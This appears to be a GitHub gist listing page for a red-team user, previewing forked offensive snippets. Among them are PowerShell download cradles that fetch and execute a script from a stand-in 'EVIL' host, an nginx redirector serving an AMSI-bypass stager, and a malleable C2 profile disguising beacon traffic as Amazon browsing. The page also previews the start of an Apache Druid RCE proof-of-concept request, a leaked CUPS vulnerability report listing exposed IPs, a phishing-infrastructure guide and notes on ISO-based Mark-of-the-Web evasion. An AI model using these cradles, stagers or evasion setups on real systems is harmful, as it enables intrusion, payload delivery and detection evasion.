Skip to content

Instantly share code, notes, and snippets.

View CalfCrusher's full-sized avatar
Pwning

Christopher CalfCrusher

Pwning
View GitHub Profile
@CalfCrusher
CalfCrusher / generate-iso-image.py
Created November 20, 2024 20:46 — forked from tijme/generate-iso-image.py
Generate an ISO image/file using Python on Windows
# pip install pycdlib
try:
from cStringIO import StringIO as BytesIO
except ImportError:
from io import BytesIO
import pycdlib
iso = pycdlib.PyCdlib()
@CalfCrusher
CalfCrusher / DownloadCradles.ps1
Created November 8, 2024 23:57 — forked from HarmJ0y/DownloadCradles.ps1
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
@CalfCrusher
CalfCrusher / cups-browsed.md
Created September 27, 2024 20:00 — forked from stong/cups-browsed.md
CUPS disclosure leaked online. Not my report. The original author is @evilsocket

Original report

  • Affected Vendor: OpenPrinting
  • Affected Product: Several components of the CUPS printing system: cups-browsed, libppd, libcupsfilters and cups-filters.
  • Affected Version: All versions <= 2.0.1 (latest release) and master.
  • Significant ICS/OT impact? no
  • Reporter: Simone Margaritelli [evilsocket@gmail.com]
  • Vendor contacted? yes The vendor has been notified trough Github Advisories and all bugs have been confirmed:
@CalfCrusher
CalfCrusher / current.csv
Created September 27, 2024 16:05 — forked from evilsocket/current.csv
cups sample
We can't make this file beautiful and searchable because it's too large.
ip,user_agent
116.202.x.x,CUPS/2.2.10 (Linux 4.19.0-17-amd64; x86_64) IPP/2.0
212.235.x.x,CUPS/2.2.7 (Linux 4.15.0-213-generic; x86_64) IPP/2.0
202.188.x.x,CUPS/2.3.3op2 (Linux 5.10.0-23-amd64; x86_64) IPP/2.0
202.188.x.x,CUPS/2.3.3op2 (Linux 5.10.0-23-amd64; x86_64) IPP/2.0
5.9.x.x,CUPS/2.2.7 (Linux 5.3.0-64-generic; x86_64) IPP/2.0
147.203.x.x,CUPS/2.2.7 (Linux 4.15.0-176-generic; x86_64) IPP/2.0
60.191.x.x,CUPS/2.2.12 (Linux 5.3.0-64-generic; x86_64) IPP/2.0
64.62.x.x,CUPS/2.2.12 (Linux 5.3.0-64-generic; x86_64) IPP/2.0
103.234.x.x,CUPS/2.4.1 (Linux 5.15.0-118-generic; x86_64) IPP/2.0

Red Team Phishing with Gophish

This guide will help you set up a red team phishing infrastructure as well as creating, perform and evaluate a phishing campaign. This is the basic lifecycle of your phishingn campaign:

+---------------------+
|Get Hardware         |   Order / setup a vServer
+---------------------+
+---------------------+
|Setup                |   Install Gophish & Mail Server
+---------------------+
@CalfCrusher
CalfCrusher / CVE-2021-25646 POC
Created September 17, 2024 13:57 — forked from 0xf4n9x/CVE-2021-25646 POC
CVE-2021-25646 Apache Druid RCE POC
POST /druid/indexer/v1/sampler HTTP/1.1
Host: x.x.x.x:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Content-Length: 1045
Connection: close
@CalfCrusher
CalfCrusher / nginx_example_vhost
Created November 12, 2023 10:05
Nginx as redirector for payloads
limit_req_zone $binary_remote_addr zone=req_zone:10m rate=5r/m;
server {
root /var/www/attacker-site.com/html;
index index.html;
server_name attacker-site.com www.attacker-site.com;
location / {
try_files $uri $uri/ =404;
}
location = /bypassamsiandrequeststager.txt {
@CalfCrusher
CalfCrusher / custom_amazon_empire_malleable.profile
Last active December 12, 2023 10:37
Amazon Empire C2 Custom Malleable profile
#
# Modified Amazon browsing traffic profile
#
set sleeptime "10000"; # Increased sleep time to 10 seconds
set jitter "500"; # Increased jitter to 500 milliseconds
set maxdns "255";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"; # Changed the User Agent
http-get {
@CalfCrusher
CalfCrusher / SimulateInternetZoneTest.ps1
Created November 7, 2023 00:18 — forked from mgraeber-rc/SimulateInternetZoneTest.ps1
Example highlighting why attackers likely choose ISO/IMG as a delivery mechanism - it evades SmartScreen because Mark-of-the-Web (MOTW) cannot be applied to non NTFS volumes
Add-Type -OutputAssembly hello.exe -TypeDefinition @'
using System;
public class Hello {
public static void Main(string[] Args) {
System.Console.WriteLine("Hello, world!");
System.Console.Read();
}
}
'@